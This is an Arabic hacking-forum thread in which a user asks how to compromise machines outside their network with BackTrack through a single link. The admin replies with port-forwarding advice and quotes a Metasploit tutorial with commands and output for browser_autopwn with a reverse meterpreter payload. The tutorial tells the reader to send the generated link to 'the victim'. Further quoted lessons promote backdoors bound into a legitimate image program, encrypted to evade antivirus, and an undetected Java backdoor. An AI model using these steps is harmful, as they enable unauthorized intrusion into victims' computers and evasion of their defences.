development-point

development-point (https://vb.development-point.com/index.php)
-   حلول و مشاكل توزيعات أختبار الأخترآق (https://vb.development-point.com/forumdisplay.php?f=23)
-   -   مشكلة في اختراق خارج شبكة (https://vb.development-point.com/showthread.php?t=658)

aaqassam 10-30-2012 05:20 PM

مشكلة في اختراق خارج شبكة
 
السلام عليكم

لقد انتهيت من تثبيت الباكتراك

و لكن عانيت الامرين في الاختراق الخارجي لذا المرجو منكم افادتي عن كيفية الختراق الخارجي بالباكتراك

و ماهي الثغرة التي استعملها من اجل اختراق عن طريق رابط فقط

Admin 12-03-2012 12:27 AM

رد: ماهي الخطوات التي اقوم بها من اجل وصول التبليغ في اختراق خارج شبكة-وماهي التغرة التي استعملها من
 

1- ماهي الخطوات التي اقوم بها من اجل وصول التبليغ في اختراق خارج شبكة

قتح بورت في المودم
أو إستخدم vpn
+
فتح بورت في جدار حماية الباك تراك


تثبيت الإبي عن طريق dzm hosts

تفعيل خاصية الجسر

نصب ناو إبي

و كل هذه ثم راح تأتي و تقول لم أخترق لذالك شوف هذا الموضوع و راح يخليك تعرف


Admin 12-03-2012 12:29 AM

رد: ماهي الخطوات التي اقوم بها من اجل وصول التبليغ في اختراق خارج شبكة-وماهي التغرة التي استعملها من
 

1- و ماهي التغرة التي استعملها من اجل اختراق عن طريق رابط فقط


إستخدم autopwn brawser
شرحتها هنا

(brwser_autopwn)(عمل باكدور ببايلودmterpreter و دمجه و تشفيره لتخطي الحمايات)(عمل باكدور ببالودjava)
اقتباس:

السلام عليكم و رحمة الله و بركاته
أرجو ان تكونو بتمام العافية
اليوم درسنا سهل بس لا زم الإنتباه و رائع
سنتطرق في هذا الدرس إلي كيفية عمل autopwn لثغرات المتصفح brewser
تقلو او لا ما معني autopwn أقلكم هي أدات قوية موجوة في الميتا تستخدم للإختراق الأوتو ماتيكي

لماذ تستخدم الأدات : ستتخدم للإختراق و هي تجرب جميع الثغرات المتاحة و تخترق الجهاز و نسبة حدوث الإختراق (داخلي أو خارجي ) هي 90 %
و انا شارحها بالتفصيل في الدرس إلي فات من الدورة تبعي
و الأن التساءل حول لماذا نقوم بعمل الإختراق الأوتوماتيكي لثغرات النتصفح اقلكم أنا
نقوم بذالك من اجل تحربة جميع ثغرات المتصفح في رابط واحد فقط و ب*الك نزيد من نسبةالإختراق 50%
مثال :
=====
إنت تريد إختراق واحد عبر ثغرة المتصفح
بس إنت مو عارف شو المتصفح إلي يستخدمو mozila .chorme .... و مش عارف الإصدار إلي تستخدمو الضحية
فلو إنت غستخدمت ثغرة موزيلا فارفوكس و الضحية يستخدم الإكسبلور راح يفشل الإختراق
و حتي إذا إستخدمت إنت ثغرةإكسبلور بس إصدار لتعمل عليه الثغرة مو نفس إصدار الضحية فراح يفشل إختراقك
ل*الك نلجأ إلي إستخدام autopwn brewsers فهي تجرب جميع الثغرات
و الرابط إلي راح تعطيه للضحية راح يكون محنك من جميع الثغرات
يعني ماراح تقلق من نوع أو إصدار متصفح الضخية
تقول كيف
أنا ساشرح
نبدء
====
نفتح تارمنل
نفتح الكونسول
عن طريق الأمر msfconsole

نتظر
http://www.dev-point.com/vb/images/s.../wol_error.gifتم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 719x558.http://im18.gulfup.com/2011-12-30/1325267904795.jpg
بعدين نكتب الأمر
search autopwn
نختار الأولي auxiliary/server/browser_autopwn
وذالك بستخدام الأمر use ثم إختيارنا
و يصر الأمر كتالي
use auxiliary/server/browser_autopwn
ثم نخار الباليود المستخدم أنا راح اختار باليود المتر برتر فهو الأحسن و ساشرحه في دروس قادمة
set payload windows/meterpreter/reverse_tcp
الأن نتكتب الأمر show options لمعرفة متطلبات الثغرة
http://www.dev-point.com/vb/images/s.../wol_error.gifتم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 743x600.http://im18.gulfup.com/2011-12-30/1325267904186.jpg
نعبي اﻷهم فقط

الأن نكتب الإبي تبعنا

و ملاحظة :
=========
إذا كان الإختراق داخلي نكتب الإبي الداخلي نعرفه عن طريق الأمر ifconfig
إذا كان الإختراق خارجي نكتب الإبي الخارحي أو ال no-ip تبعك أحسن بكثير
نكتبه
set lhost 192.168.117.129
ثم البورت المستخدم و هو لازم يكون مفتوح في الروتر و في جدار الحماية
و هو مستخدم تلقائيا البورت 8080 و ممكن نغيرو بس إحنا نخله كما هو
ثم نعبي الخيار الأخير وهو ال URIPATH
نكتب / set URIPATH
ثم الأمر الاخير run أو exploit حسب ما تحب

http://www.dev-point.com/vb/images/s.../wol_error.gifتم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 683x461.http://im18.gulfup.com/2011-12-30/132526790333.jpg

ننتظر.........
راح في اﻷخيريعطيك رابط و هو الرابط إلي تبعثو للضحية
أنا النتيجة إلي ظهرت لي في الخير
msf auxiliary(browser_autopwn) > run[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >[*] Starting exploit modules on host 192.168.117.129...[*] ---
...snip...[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/zCtg7oC[*] Local IP: http://192.168.117.129:8080/zCtg7oC[*] Server started.[*] Starting exploit multi/browser/mozilla_compareto with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/vTNGJx[*] Local IP: http://192.168.117.129:8080/vTNGJx[*] Server started.[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7[*] Local IP: http://192.168.117.129:8080/abmR33jxStsF7[*] Server started.[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler
...snip...[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV[*] Local IP: http://192.168.117.129:8080/RdDDhKANpV[*] Server started.[*] --- Done, found 12 exploit modules[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.117.129:8080/[*] Server started.
هذا الرابط إلي نبعثو للضحية
http://192.168.117.129:8080/

و إختراق موفق

هذه الدورة مقدمة من قبل somari

و من لم تظهر معه الصور
رابط تحميلها
http://www.mediafire.com/?xgbon6v0ch1dbc9




اقتباس:

الدرس الثاني و سيكون شرحا لكيفية عمل باك دور و دمجه مع برنامج و تشفيره و تخطي حماية avg المشهورة
و أنا شارح فيه أيضا باليود meterpreter و ساشرح نو عين أخرين من الباليودات في الدروس القادمة
أتركمكم مع الشرح <HD>
رابط تحميله
http://www.mediafire.com/?6oxpo4eh5p7k347

اقتباس:

ملاحظة في الدرس2 لقد تم دمج الباك دور مع برنامج تصغير الصورPIXresizer
الدرس3 :
و هو حول كيفية إنشاء باكدور java كلين غير مشكوف من اي حماية
إلي راح يكون يصيغة jar.
و هاذا الباك دور متميز بتخطيه للحمايات كلها
حتي بدون تشفير و هو من ًيستخدم لإنشاءه باليود <<و انا شارحو في الدرس>>
java/meterpreter/reverse_tcp
و هو من أقوي البالودات الموجودة علي الساحة
و هو يخلق إتصال عكسي و أنا أنصح يه لتخطي الجدران النارية و الأونتي فايروس إذا كانت الضحية تستخدمهم
رابط نتائج الفحص مع العلم بدون تشفير <<مذهل>>
http://www.virustotal.com/file-scan/...672-1325275849
أترككم مع الدرس<<HD>>
رابط التحميل
http://www.mediafire.com/?va72bqvq2qgax68




الساعة الآن 12:18 PM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47